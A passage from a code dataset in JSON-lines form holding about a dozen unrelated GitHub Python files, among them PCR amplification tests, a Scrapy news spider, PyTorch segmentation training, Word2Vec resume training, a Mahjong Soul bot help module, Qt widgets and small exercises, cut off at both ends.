Fetch status of channel lock.\n If not locked, locks and returns lock.\n \"\"\"\n if message.channel.id not in locker:\n locker[message.channel.id] = asyncio.Lock()\n return locker[message.channel.id]\n\n'''\nTrim Check\n'''\n\nasync def fetch_trim(message: discord.message) -> bool:\n \"\"\"\n Check if trim is required. 
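Trim is needed once the channel's running token count exceeds constants.MEM_MAX * constants.MEM_UPPER. 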
Returns bool.\n \"\"\"\n return counter[message.channel.id] > (constants.MEM_MAX * constants.MEM_UPPER)\n\n\n\n","repo_name":"praetor29/personalgpt","sub_path":"src/memory/creation.py","file_name":"creation.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"30913599690","text":"from src.amplification import eval_R, Amplification, get_pfr_prf\r\nimport numpy as np\r\n\r\n\r\ndef eval_E_Ui_brute_force(i: int, A: np.ndarray, E_U0: np.ndarray) -> np.ndarray:\r\n if i == 1:\r\n return A @ E_U0\r\n\r\n return A @ eval_E_Ui_brute_force(i - 1, A, E_U0)\r\n\r\n\r\ndef eval_V_Ui_brute_force(\r\n i: int, A: np.ndarray, V_U0: np.ndarray, E_U0: np.ndarray,\r\n K1: np.ndarray, K2: np.ndarray,\r\n p: float, R: float\r\n) -> np.ndarray:\r\n V_Binomials = pow(1 + p, i-1)*K1 + pow(1 - p, i - 1)*K2\r\n if i == 1:\r\n return A @ V_U0 @ A.T + V_Binomials\r\n\r\n return A @ eval_V_Ui_brute_force(i - 1, A, V_U0, E_U0, K1, K2, p, R) @ A.T + V_Binomials\r\n\r\n\r\np_fr, p_rf = 0.87, 0.92\r\nR = eval_R(p_fr, p_rf)\r\npbar = np.sqrt(p_fr * p_rf)\r\nE_U0 = np.array([3, 4])\r\nV_U0 = np.array([[3, 0], [0, 4]])\r\ncls = Amplification(R, pbar, E_U0, V_U0)\r\nA = np.array([[1, p_rf], [p_fr, 1]])\r\n\r\n\r\ndef infty_norm(err):\r\n return np.max(np.max(err))\r\n\r\n\r\ndef test_A():\r\n assert infty_norm(A - cls.get_A()) < 1e-14, \"A is not correct\"\r\n assert infty_norm(A - cls.get_Atoi(1)) < 1e-14, \"A is not correct\"\r\n assert infty_norm(A@A - cls.get_Atoi(2)) < 1e-14, \"A^2 is not correct\"\r\n\r\n\r\ndef test_A_new():\r\n X = 1/np.sqrt(2)*np.array([[R, R], [1, -1]])\r\n X_inv = 1/(R*np.sqrt(2))*np.array([[1, R], [1, -R]])\r\n L = np.array([[1 + pbar, 0], [0, 1-pbar]])\r\n A_new = X@L@X_inv\r\n assert infty_norm(A_new - cls.get_A()) < 1e-14, \"A is not correct\"\r\n\r\n\r\ndef test_E_Ui(i=5):\r\n error = eval_E_Ui_brute_force(i, A, E_U0) - cls.get_E_Ui(i)\r\n assert infty_norm(error) < 1e-10, \"E Ui not correct\"\r\n\r\n\r\ndef test_V_Ui(i=5):\r\n args = A, V_U0, E_U0, cls.K1, cls.K2, pbar, R\r\n error = eval_V_Ui_brute_force(i, *args) - cls.get_V_Ui(i)\r\n assert infty_norm(error) < 1e-10, \"V Ui not correct\"\r\n\r\n\r\ndef test_EXi_over_EYi():\r\n R = 0.9\r\n pbar = 0.85\r\n l1 = 1 + pbar\r\n l2 = 1 - pbar\r\n\r\n i = np.array((list(range(5))))\r\n\r\n for (EX0, EY0) in [(10, 10), (10, 0), (0, 10)]:\r\n a = EX0 + R*EY0\r\n b = EX0 - R*EY0\r\n kls = Amplification(R, pbar, np.array([EX0, EY0]), np.random.random((2, 2)))\r\n EXi = a/2*l1**i + b/2*l2**i\r\n EYi = a/2/R*l1**i - b/2/R*l2**i\r\n indices = EYi > 0\r\n val1 = EXi[indices]/EYi[indices]\r\n val2 = kls.get_EXi_over_EYi(i)\r\n error = val1 - val2[indices]\r\n assert infty_norm(error) < 1e-10, \"EXi/EYi not correct!\"","repo_name":"usnistgov/bias-uq-pcr","sub_path":"test/test_amplification.py","file_name":"test_amplification.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"27573456410","text":"#!/usr/bin/env python\n\nimport sys\nimport SimpleITK as sitk\n\n# verify that we have the correct number of arguments\nif ( len( sys.argv ) != 5 ):\n sys.stderr.write( \"Usage: prog inputFile outputFile replaceValue upperThreshold\\n\" )\n exit( 1 )\n \n# copy the arguments in to variables\ninputFileName = sys.argv[1]\noutputFileName = sys.argv[2]\nreplaceValue = int( sys.argv[3] )\nupperThreshold = float( sys.argv[4] )\n\n# Read the file into an 
sitkImage\nimage = sitk.ReadImage( inputFileName )\n\n# Threshold the value [0,2), results in values inside the range 1, 0 otherwise\nboundary = sitk.BinaryThreshold( image, 0, upperThreshold, 1, 0 )\n\nboundary = sitk.BinaryMorphologicalClosing( boundary, 1 )\n\n# Remove any label pixel not connected to the boarder\nboundary = sitk.BinaryGrindPeak( boundary )\n\n\n\nboundary = sitk.Cast( boundary, image.GetPixelIDValue() )\n\n# Multiply, the input image by not the boarder.\n# This will multiply the image by 0 or 1, where 0 is the\n# boarder. Making the board 0\nimage = image * ~boundary\n\n# add the replace value to the pixel on the board\nimage = image + ( boundary * replaceValue )\n\n# sitk.Show( image )\n","repo_name":"paniwani/SimpleITK","sub_path":"Examples/BoarderSegmentation.py","file_name":"BoarderSegmentation.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"38206372613","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait as W\nfrom selenium.webdriver.support import expected_conditions as E\nfrom selenium.webdriver import ActionChains as A\n\nimport pyautogui as P\nimport time\n\n\nexec_path=r\"C:\\Users\\NASA7\\Downloads\\chromedriver_win32 (4)\\chromedriver.exe\"\nURL1=r\"https://inderpsingh.blogspot.com/2014/08/demowebapp_24.html\"\nURL2=r\"https://crossbrowsertesting.github.io/drag-and-drop\"\nheadling_css_locator=\".post-body>div:nth-child(1)>div:nth-child(1)>form:nth-child(1)>h3:nth-child(1)\"\ndistance_id_locator=\"distance\"\ndraggable_id_locator=\"draggable\"\ndroppable_id_locator=\"droppable\"\nwait_time_out=15\ndriver=webdriver.Chrome(executable_path=exec_path)\nwait_variable=W(driver, wait_time_out)\ndriver.get(URL1)\nheadling_element=wait_variable.until(E.presence_of_element_located((By.CSS_SELECTOR,headling_css_locator)))\ndistance_element=wait_variable.until(E.presence_of_element_located((By.ID,distance_id_locator)))\na=A(driver)\na.double_click(headling_element)\na.move_to_element_with_offset(distance_element,0,0)\na.click_and_hold(distance_element)\na.release()\na.send_keys(\"1000\")\na.perform()\n","repo_name":"stepstep3/PycharmProjects4","sub_path":"untitled5/curs 8.1 MOUSE ACTIONS.py","file_name":"curs 8.1 MOUSE ACTIONS.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29642224991","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom news_scrapy.items import News\nfrom urllib.parse import urljoin\nfrom scrapy_redis.spiders import RedisCrawlSpider\n\nclass IfengNewsSpider(RedisCrawlSpider):\n\tname = 'ifeng_news'\n\tallowed_domains = ['ifeng.com']\n\n\trules=(Rule(LinkExtractor(allow=('[0-9]+\\.shtml'),deny=('house'),\n\t\trestrict_xpaths=('//a')),\n\tcallback=\"parse_item\",follow=False),\n\t# Rule(LinkExtractor(allow=('list\\.shtml'),\n\t\t# restrict_xpaths=('//ul[contains(@class,\"clearfix\")]')),follow=False),\n\t)\n\n\tdef parse_item(self,response):\n\t\tnews=News()\n\t\ttitle=response.xpath('//h1[contains(@id,\"artical_topic\")]/text()')\n\t\tif title is None or len(title)==0:\n\t\t\treturn\n\t\tnews[\"title\"]=title[0].extract().encode('utf-8')\n\n\t\tpics=response.xpath('//p[contains(@class,\"detailPic\")]/img/@src')\n\t\tif pics is not None and 
len(pics)>0:\n\t\t\tnews[\"picture\"]=pics.extract()[0];\n\t\t\tpictureInfo=response.xpath('//p[contains(@class,\"picIntro\")]/text()')\n\t\t\tif pictureInfo is not None and len(pictureInfo)>0:\n\t\t\t\tpictureInfo=pictureInfo.extract()\n\t\t\t\tif pictureInfo is not None and len(pictureInfo)>0:\n\t\t\t\t\tnews[\"picture_info\"]=pictureInfo[0].encode('utf-8')\n\t\t\t\telse:\n\t\t\t\t\tnews[\"picture_info\"]=\"Null\"\n\t\t\telse:\n\t\t\t\tnews[\"picture_info\"]=\"Null\"\n\t\telse:\n\t\t\tnews[\"picture\"]=\"Null\"\n\t\t\tnews[\"picture_info\"]=\"Null\"\n\n\t\tcontent=response.xpath('//div[contains(@id,\"main_content\")]/p/text()')\n\t\tif content is None or len(content)==0:\n\t\t\treturn\n\t\telse:\n\t\t\tnews[\"content\"]=\"\\n\".join(content.extract()).encode('utf-8')\n\n\t\tsource=response.xpath('//span[contains(@itemprop,\"publisher\")]/span/a/text()')\n\t\tif source is None or len(source)==0:\n\t\t\treturn\n\t\telse:\n\t\t\tnews[\"source\"]=''.join(source.extract()).encode('utf-8')\n\n\t\ttime=response.xpath('//span[contains(@itemprop,\"datePublished\")]/text()')\n\t\tif time is None or len(time)==0:\n\t\t\treturn\n\t\telse:\n\t\t\tnews[\"time\"]=''.join(time.extract()).encode('utf-8')\n\n\t\tnews[\"url\"]=response.url\n\n\t\tnewstype=response.xpath('//div[contains(@class,\"theLogo\")]/div/a/text()')\n\t\tif newstype is None or len(newstype)==0:\n\t\t\treturn\n\t\telse:\n\t\t\tnews[\"news_type\"]=newstype[0].extract().encode('utf-8')\n\n\t\tyield news\n","repo_name":"Unintelligibility/Reality-Spider","sub_path":"news_scrapy/news_scrapy/spiders/ifeng_news_spider.py","file_name":"ifeng_news_spider.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73342151203","text":"import torch\nimport torch.optim as optim\nimport numpy as np\nfrom pathlib import Path\nfrom sklearn.model_selection import KFold\nimport math \nimport kornia\n\nfrom utils.train import (\n seed_all,\n set_study,\n set_model,\n get_calculated_means_stds_per_fold, \n get_patch_lists, \n get_loaders, \n save_checkpoint,\n train_epoch,\n validate_epoch,\n)\nfrom utils.parser import create_train_parser\n\n\ndef objective(trial):\n epochs_no_improve:int = 0\n kfold = KFold(n_splits=num_folds, shuffle=False)\n loss_total = np.ones(num_folds)*99999\n epochs = np.ones(num_folds)*0\n img_list, msk_list = get_patch_lists(\n data_path=data_path, \n subset=\"trainval\")\n for fold, (train_ids, val_ids) in enumerate(kfold.split(img_list)):\n train_img_dir = [img_list[i] for i in train_ids]\n train_msk_dir = [msk_list[i] for i in train_ids]\n valid_img_dir = [img_list[i] for i in val_ids]\n valid_msk_dir = [msk_list[i] for i in val_ids]\n epochs_no_improve = 0\n\n model = set_model(architecture=architecture, encoder_name=encoder_name, pretrained=pretrained, b_bilinear=b_bilinear, replace_stride_with_dilation=replace_stride_with_dilation, num_classes=3).to(device=device)\n \n loss_fn = kornia.losses.DiceLoss()\n lr = trial.suggest_loguniform(\"lr\", lr_ranges[0], lr_ranges[1])\n print(f\"suggested LR: {lr}\")\n reduce_factor = trial.suggest_int(\"lr_factor\", int(lr_factor_ranges[0]*10), int(lr_factor_ranges[1]*10), step=int(lr_factor_ranges[2]*10))\n reduce_factor = reduce_factor*0.1\n optimizer = optim.Adam(model.parameters(), lr = lr)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=reduce_factor, min_lr=lr_ranges[0], patience=lr_scheduler_patience)\n means, stds = get_calculated_means_stds_per_fold(fold)\n 
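# the fold-specific means/stds computed above are passed to get_loaders for input normalization\n        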
train_loader, valid_loader = get_loaders(\n train_img_dir = train_img_dir,\n train_msk_dir = train_msk_dir,\n valid_img_dir = valid_img_dir, \n valid_msk_dir = valid_msk_dir,\n mean = means,\n std = stds,\n batch_size = args.batch_size,\n num_workers = num_workers,\n pin_memory = False,\n )\n scaler = torch.cuda.amp.GradScaler()\n for epoch in range(max_epochs):\n train_loss = train_epoch(\n train_loader, \n model, \n optimizer, \n loss_fn, \n scaler, \n cur_epoch=epoch,\n trial_number=trial.number,\n fold=fold,\n )\n checkpoint = {\n \"state_dict\": model.state_dict(),\n \"optimizer\":optimizer.state_dict(),\n }\n \n valid_loss = validate_epoch(\n valid_loader, \n model, \n cur_epoch=epoch, \n trial_number=trial.number,\n fold=fold,\n )\n scheduler.step(valid_loss)\n \n if valid_loss < loss_total[fold]:\n loss_total[fold] = valid_loss\n if b_save_checkpoint:\n save_checkpoint(checkpoint, filename=f\"{str(model_path)}/{architecture}_{encoder_name}_dil{int(replace_stride_with_dilation)}_bilin{int(b_bilinear)}_pre{int(pretrained)}.pth.tar\")\n else:\n epochs_no_improve+=1\n # sometimes it can happen, that valid_loss is nan --> cannot save nan to database, so we need to change it\n if math.isnan(valid_loss):\n valid_loss = 99999\n \n if epochs_no_improve >= es_patience:\n print(f\"Early Stopping on epoch {epoch}\")\n epochs[fold]=epoch\n break\n\n trial.set_user_attr('Valid loss per fold', list(loss_total))\n trial.set_user_attr('root path', root_path)\n trial.set_user_attr('architecture', architecture)\n trial.set_user_attr('encoder_name', encoder_name)\n trial.set_user_attr('batch_size', batch_size)\n trial.set_user_attr('b_bilinear', b_bilinear)\n trial.set_user_attr('pretrained', pretrained)\n trial.set_user_attr('replace_stride', replace_stride_with_dilation)\n trial.set_user_attr('final_epoch', list(epochs))\n trial.set_user_attr('lr_scheduler_patience', lr_scheduler_patience)\n print(f\"Validation loss per fold: {loss_total}\") \n return np.mean(loss_total)\n\n\n\nif __name__ == \"__main__\":\n args = create_train_parser()\n run_prefix:str = args.run_prefix\n b_clean_study:bool = args.b_clean_study\n b_save_checkpoint:bool = args.save_checkpoint\n pretrained:bool = args.pretrained\n b_bilinear:bool = args.b_bilinear\n replace_stride_with_dilation:bool = args.replace_stride_with_dilation\n encoder_name:str = args.encoder_name\n architecture:str = args.architecture\n lr_ranges = [args.lr_min, args.lr_max]\n\n if args.db_name == \"\":\n db_name:str = f\"{run_prefix}_{architecture}_{encoder_name}_dil{int(replace_stride_with_dilation)}_bilin{int(b_bilinear)}_pre{int(pretrained)}\"\n else:\n db_name = args.db_name\n if args.study_name == \"\":\n study_name:str = f\"{architecture}_{encoder_name}_dil{int(replace_stride_with_dilation)}_bilin{int(b_bilinear)}_pre{int(pretrained)}\"\n else:\n study_name = args.study_name\n root_path: str = args.root_path\n data_path = Path(root_path) / \"data\" \n num_folds:int = args.n_folds\n batch_size:int = args.batch_size\n n_trials:int = args.n_trials\n\n lr_factor_ranges = [0.1, 0.9, 0.1]\n max_epochs:int = 100\n es_patience:int = 10\n lr_scheduler_patience:int = 5\n seed:int = args.seed\n\n device: str = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n num_workers: int = 2\n\n seed_all(seed=seed)\n\n # Create Paths\n model_path = Path(f'{root_path}/models/')\n model_path.mkdir(parents=True, exist_ok=True)\n result_path = Path(f'{root_path}/results/')\n result_path.mkdir(parents=True, exist_ok=True)\n\n study = set_study(db_name=db_name, 
study_name=study_name, root_path=root_path, seed=seed, b_clean_study=b_clean_study)\n\n study.optimize(lambda trial: objective(trial), n_trials=n_trials)","repo_name":"grimmlab/UAVWeedSegmentation","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"5145002934","text":"import nltk\nimport pandas as pd\nimport re\nfrom gensim.models import Word2Vec\nfrom nltk import pos_tag\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer, WordNetLemmatizer\n\nnltk.download('wordnet')\n\nstop_words = set(stopwords.words('english'))\nstemmer = PorterStemmer()\nlemmatizer = WordNetLemmatizer()\n\nresumeFile1 = '~/Projects/hau/csstudy/resume-screening-and-classification/demo-set/resumes/2482_edited.xlsx'\nresumeDf1 = pd.read_excel(resumeFile1)\n\nresumeFile2 = '~/Projects/hau/csstudy/resume-screening-and-classification/demo-set/resumes/resumes.xlsx'\nresumeDf2 = pd.read_excel(resumeFile2)\n\njdFile = '~/Projects/hau/csstudy/resume-screening-and-classification/demo-set/job-descriptions/glassdoor_jobdescriptions.xlsx'\njdDf = pd.read_excel(jdFile)\n\ndef preprocessing2(text):\n text = re.sub('http\\S+\\s*', ' ', text)\n text = re.sub('RT|cc', ' ', text)\n text = re.sub('#\\S+', '', text)\n text = re.sub('@\\S+', ' ', text)\n text = re.sub('[%s]' % re.escape(\"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\"\"\"), ' ', text)\n text = re.sub(r'[^\\x00-\\x7f]',r' ', text)\n text = re.sub('\\s+', ' ', text)\n words = text.split()\n words = [word for word in words if word.lower() not in stop_words]\n # words = [stemmer.stem(word.lower()) for word in words if word.lower() not in stop_words]\n tagged_words = pos_tag(words)\n lemmatized_words = []\n for word, pos in tagged_words:\n wordnet_pos = get_wordnet_pos(pos)\n lemmatized_words.append(lemmatizer.lemmatize(word.lower(), wordnet_pos))\n return lemmatized_words\n # return words\n\ndef get_wordnet_pos(tag):\n if tag.startswith('J'):\n return 'a' # Adjective\n elif tag.startswith('N'):\n return 'n' # Noun\n elif tag.startswith('R'):\n return 'r' # Adverb\n elif tag.startswith('V'):\n return 'v' # Verb\n else:\n return 'n'\n\nresumeDf1['cleanedResume'] = resumeDf1['Resume'].apply(lambda x: preprocessing2(x))\nresumeDf2['cleanedResume'] = resumeDf2['Resume'].apply(lambda x: preprocessing2(x))\njdDf['cleanedDetails'] = jdDf['Details'].apply(lambda x: preprocessing2(x))\n\ncorpus = resumeDf1['cleanedResume'].tolist() + resumeDf2['cleanedResume'].tolist() + jdDf['cleanedDetails'].tolist()\n\nmodel = Word2Vec(sentences=corpus, vector_size=300, window=5, min_count=1, sg=1)\n\n# model.save('word2vec.model')\nmodel_path = 'word2vec.bin'\nmodel.wv.save_word2vec_format(model_path, binary=True)\n\nvocabulary_size = len(model.wv.key_to_index)\nprint(\"Vocabulary Size:\", vocabulary_size)\n\ntarget_word = 'mechanic'\nsimilar_words = model.wv.most_similar(target_word, topn=10)\n\nfor word, score in similar_words:\n print(word, score)\n","repo_name":"chelscelis/resume-screening-and-classification","sub_path":"word2vec_train.py","file_name":"word2vec_train.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6269248148","text":"# coding=utf-8\nimport hoshino\nimport asyncio\n\nfrom hoshino import Service, priv, config\nfrom hoshino.typing import CQEvent\n\nforward_msg_exchange = config.FORWARD_MSG_EXCHANGE\nforward_msg_name = 
config.FORWARD_MSG_NAME\nforward_msg_uid = config.FORWARD_MSG_UID\nrecall_msg_set = config.RECALL_MSG_SET\nRECALL_MSG_TIME = config.RECALL_MSG_TIME\n\nsv_help = '''\n由于牌谱屋不收录铜之间以及银之间牌谱,故所有数据仅统计2019年11月29日后金场及以上场次的数据\nPS:暂时只支持四麻对局的查询\n'''.strip()\n\nmajsoul_help_1 = '''\n查询指令:\n- [雀魂信息/雀魂查询 昵称] 查询该ID的雀魂基本对局数据(包含金场以上所有)\n- [三麻信息/三麻查询 昵称] 查询该ID��魂三麻的基本对局数据(包含金场以上所有)\n- [雀魂信息/雀魂查询 (金/金之间/金场/玉/王座) 昵称] 查询该ID在金/玉/王座之间的详细数据\n- [三麻信息/三麻查询 (金/金之间/金场/玉/王座) 昵称] 查询该ID在三麻金/玉/王座之间的详细数据\n- [雀魂牌谱 昵称] 查询该ID下最近五场的对局信息\n- [三麻牌谱 昵称] 查询该ID下最近五场的三麻对局信息\n'''.strip()\n\nmajsoul_help_2 = '''\n对局订阅指令:\n- [雀魂订阅 昵称] 订阅该昵称在金之间以上的四麻对局信息 \n- [三麻订阅 昵称] 订阅该昵称在金之间以上的三麻对局信息 \n- [(取消/关闭)雀魂订阅 昵称] 将该昵称在本群的订阅暂时关闭 \n- [(取消/关闭)三麻订阅 昵称] 将该昵称在本群的三麻订阅暂时关闭 \n- [开启雀魂订阅 昵称] 将该昵称在本群的订阅开启 \n- [开启三麻订阅 昵称] 将该昵称在本群的三麻订阅开启 \n- [删除雀魂订阅 昵称] 将该昵称在本群的订阅删除\n- [删除三麻订阅 昵称] 将该昵称在本群的三麻订阅删除\n- [雀魂订阅状态] 查询本群的雀魂订阅信息的开启状态 \n- [三麻订阅状态] 查询本群的雀魂订阅信息的开启状态 \n'''.strip()\n\nsv = Service(\n name = '雀魂查询', #功能名\n use_priv = priv.NORMAL, #使用权限 \n manage_priv = priv.ADMIN, #管理权限\n visible = True, #False隐藏\n enable_on_default = True, #是否默认启用\n bundle = '查询', #属于哪一类\n help_ = sv_help #帮助文本\n )\n\ndef gen_bundle_manual(bundle_name, service_list, gid):\n manual = [bundle_name]\n service_list = sorted(service_list, key=lambda s: s.name)\n for sv in service_list:\n if sv.visible:\n spit_line = '=' * max(0, 18 - len(sv.name))\n manual.append(f\"|{'○' if sv.check_enabled(gid) else '×'}| {sv.name} {spit_line}\")\n if sv.help:\n manual.append(sv.help)\n return '\\n'.join(manual)\n\n@sv.on_fullmatch([\"帮助雀魂查询\"])\nasync def bangzhu_majsoul(bot, ev: CQEvent):\n if forward_msg_exchange == 1:\n data_all = []\n msg1 = sv_help\n data1 = {\n \"type\": \"node\",\n \"data\": {\n \"name\": f\"{forward_msg_name}\",\n \"uin\": f\"{forward_msg_uid}\",\n \"content\": msg1\n }\n }\n msg2 = majsoul_help_1\n data2 = {\n \"type\": \"node\",\n \"data\": {\n \"name\": f\"{forward_msg_name}\",\n \"uin\": f\"{forward_msg_uid}\",\n \"content\": msg2\n }\n }\n msg3 = majsoul_help_2\n data3 = {\n \"type\": \"node\",\n \"data\": {\n \"name\": f\"{forward_msg_name}\",\n \"uin\": f\"{forward_msg_uid}\",\n \"content\": msg3\n }\n }\n data_all=[data1,data2,data3]\n if recall_msg_set == 1:\n recall = await bot.send_group_forward_msg(group_id=ev['group_id'], messages=data_all)\n notice = await bot.send(ev, f\"将在{RECALL_MSG_TIME}s后将撤回消息\")\n \n await asyncio.sleep(RECALL_MSG_TIME)\n\n await bot.delete_msg(message_id=recall['message_id'])\n await bot.delete_msg(message_id=notice['message_id'])\n else:\n await bot.send_group_forward_msg(group_id=ev['group_id'], messages=data_all)\n else:\n if recall_msg_set == 1:\n recall_1 = await bot.send(ev, sv_help)\n recall_2 = await bot.send(ev, majsoul_help_1)\n recall_3 = await bot.send(ev, majsoul_help_2)\n notice = await bot.send(ev, f\"将在{RECALL_MSG_TIME}s后将撤回消息\")\n\n await asyncio.sleep(RECALL_MSG_TIME)\n\n await bot.delete_msg(message_id=recall_1['message_id'])\n await bot.delete_msg(message_id=recall_2['message_id'])\n await bot.delete_msg(message_id=recall_3['message_id'])\n await bot.delete_msg(message_id=notice['message_id'])\n else:\n await bot.send(ev, sv_help)\n await bot.send(ev, majsoul_help_1)\n await bot.send(ev, majsoul_help_2)\n\n\n","repo_name":"Soung2279/haru-bot-setup","sub_path":"hoshino/modules/majsoul/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"zh","doc_type":"code","stars":53,"dataset":"github-code","pt":"54"} +{"seq_id":"41528565646","text":"from kpsn.models.morph import 
affine_mode as afm\nfrom kpsn.models import pose\nfrom kpsn.util import keypt_io, alignment, skeleton\n\nfrom kpsn_test.routines.util import update\nfrom kpsn_test.routines.datasets import npy_keypts\n\nimport jax.random as jr\n\ndef random_morph(gt_obs, M, n_subj, ref_subj_ix, id_subj_ix, rngk, hyper_kw, param_kw):\n\n morph_hyperparams = afm.init_hyperparams(\n observations = gt_obs,\n N = n_subj, M = M,\n reference_subject = ref_subj_ix,\n identity_sess = id_subj_ix,\n upd_var_modes = 0, # prior variance params don't matter - not learning\n upd_var_ofs = 0,\n **hyper_kw)\n\n morph_params = afm.sample_parameters(\n rkey = rngk,\n hyperparams = morph_hyperparams,\n **param_kw)\n\n return morph_params.with_hyperparams(morph_hyperparams)\n\n\ndef generate(\n cfg: dict,\n ):\n\n (N, M), gt_obs, metadata = npy_keypts.generate(\n cfg = cfg\n )\n\n # ----- set up identical poses for each session\n src_keypts = gt_obs.keypts[metadata['session_slice'][cfg['src_sess']]]\n slices, gt_all_poses = keypt_io.to_flat_array({\n f'subj{i}': src_keypts for i in range(cfg['n_subj'])\n })\n session_ix, session_ids = keypt_io.ids_from_slices(gt_all_poses, slices)\n\n # ------ sample parameters and apply to poses\n \n params = random_morph(\n pose.Observations(gt_all_poses, session_ids),\n M, cfg['n_subj'], session_ix['subj0'], session_ix['subj0'],\n jr.PRNGKey(cfg['seed']), cfg['hyperparam'], cfg['param_sample']\n )\n all_feats = afm.transform(params, gt_all_poses, session_ids)\n\n # ------ format new dataset and return\n new_obs = pose.Observations(all_feats, session_ids)\n\n new_metadata = dict(\n session_ix = session_ix,\n session_slice = slices,\n body = {f'subj{i}': i for i in range(cfg['n_subj'])},\n **{k: {sess: v[cfg['src_sess']] for sess in slices}\n for k, v in metadata.items() if k not in ['session_ix']\n if k not in ['session_ix', 'session_slice']})\n \n return (cfg['n_subj'], M), new_obs, new_metadata\n \n \n\ndefaults = dict(\n src_sess = None,\n **npy_keypts.defaults,\n n_subj = 2,\n hyperparam = dict(\n L = 1,\n ),\n param_sample = dict(\n update_std = 0.03,\n offset_std = 0.5\n ),\n seed = 2\n)","repo_name":"calebweinreb/keypoint-size-norm","sub_path":"test/kpsn_test/routines/datasets/lra_keypts.py","file_name":"lra_keypts.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26255864754","text":"from pydm.widgets import PyDMLineEdit\n\nfrom siriuspy.opticscorr.csdev import Const as _Const\nfrom siriushla.widgets import SiriusLedAlert\nfrom siriushla.widgets.dialog import StatusDetailDialog\nfrom siriushla.as_ap_configdb import LoadConfigDialog as _LoadConfigDialog\n\n\nclass ConfigLineEdit(PyDMLineEdit):\n\n def mouseReleaseEvent(self, _):\n \"\"\"Reimplement mouse release event.\"\"\"\n if 'SI' in self.channel and 'Tune' in self.channel:\n config_type = 'si_tunecorr_params'\n elif 'BO' in self.channel and 'Tune' in self.channel:\n config_type = 'bo_tunecorr_params'\n elif 'SI' in self.channel and 'Chrom' in self.channel:\n config_type = 'si_chromcorr_params'\n elif 'BO' in self.channel and 'Chrom' in self.channel:\n config_type = 'bo_chromcorr_params'\n popup = _LoadConfigDialog(config_type)\n popup.configname.connect(self._config_changed)\n popup.exec_()\n\n def _config_changed(self, configname):\n self.setText(configname)\n self.send_value()\n self.value_changed(configname)\n\n\nclass StatusLed(SiriusLedAlert):\n\n def __init__(self, parent=None, init_channel='', labels=list()):\n 
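# initialize the base SiriusLedAlert, then keep parent and labels as attributes\n        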
super().__init__(parent, init_channel=init_channel)\n self.parent = parent\n self.labels = labels\n\n def mouseDoubleClickEvent(self, event):\n msg = StatusDetailDialog(\n parent=self.parent, pvname=self.channel,\n labels=_Const.STATUS_LABELS)\n msg.exec_()\n super().mouseDoubleClickEvent(event)\n","repo_name":"lnls-sirius/hla","sub_path":"pyqt-apps/siriushla/as_ap_opticscorr/custom_widgets.py","file_name":"custom_widgets.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"74344935842","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\nclass Solution(object):\n def reverseList(self, head):\n if not head: return None\n if not head.next: return head\n \n hold=ListNode(head.next.val, head.next.next)\n myList=ListNode(head.val)\n \n while hold!=None:\n temp=ListNode(myList.val, myList.next)\n \n myList=ListNode(hold.val, None)\n myList.next=temp\n \n hold=hold.next\n \n return myList","repo_name":"charlenerocha/CodingPractice","sub_path":"206-reverse-linked-list/206-reverse-linked-list.py","file_name":"206-reverse-linked-list.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72556833123","text":"import random\nimport os\n\ndef run():\n menu = \"\"\" Adivina el numero\n \n 3.- Facil (9 oportunidades)\n 2.- Medio (6 oportunidades)\n 1.- Dificil (3 oportunidades)\n \n Indica el nivel al que deseas competir: \"\"\"\n \n vueltas = int(input(menu)) * 3\n tope = int(input('Ingresa el limite superior a adivinar: '))\n rand = random.randint(0,tope)\n win = False\n\n numero = int(input('Ingresa un numero: '))\n for i in range(1,vueltas):\n if numero == rand:\n os.system('clear')\n print('Felicidades!!! 
